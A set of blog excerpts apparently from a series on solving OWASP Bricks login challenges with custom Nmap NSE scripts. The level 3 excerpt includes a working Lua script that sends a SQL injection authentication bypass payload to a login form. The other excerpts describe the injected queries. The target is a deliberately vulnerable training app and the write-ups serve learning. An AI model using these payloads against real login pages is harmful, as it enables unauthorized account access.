Challenge Information OWASP Bricks Docker version: here This is a series where I will write my own Nmap NSE script to solve that challenge. This is actually a task given by masta ghimau during MCC 2023. Challenge Solution Login level 4 is just a SQL injection with bracket and uses double quote. Here’s an example: SQL Query: SELECT * FROM users WHERE name=("a") and password=("a"). We could just modify previous NSE script by changing the query. ...
Challenge Information OWASP Bricks Docker version: here This is a series where I will write my own Nmap NSE script to solve that challenge. This is actually a task given by masta ghimau during MCC 2023. Challenge Solution Login level 3 is just a slightly harder SQL injection as it add brackets. Here’s an example: SQL Query: SELECT * FROM users WHERE name=('1') and password=('1') LIMIT 0,1. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 local http = require "http" local shortport = require "shortport" portrule = shortport.http action = function(host,port) local resp,final,query r={} r['username']="a') OR 1=1-- a" r['passwd']="test" r['submit']="Submit" resp = http.post(host,port,"/login-3/index.php",nil,nil,r) final = string.match(resp.body, '<p>.*alert%-box.->(.-)<a.*</p>') query = string.match(resp.body, ".*SQL Query(.*)<a.*</div>") return {payload = r ,SQLQuery = query , result = final} end This code is built based on http-title.nse. ...
Challenge Information OWASP Bricks Docker version: here This is a series where I will write my own Nmap NSE script to solve that challenge. This is actually a task given by masta ghimau during MCC 2023. Challenge Solution Login level 2 is just a simple SQL injection which javascript validation. Since we are using Nmap NSE to perform SQL injection, it will ignore javascript as it is front end validation. We can use the same NSE script as previous challenge. ...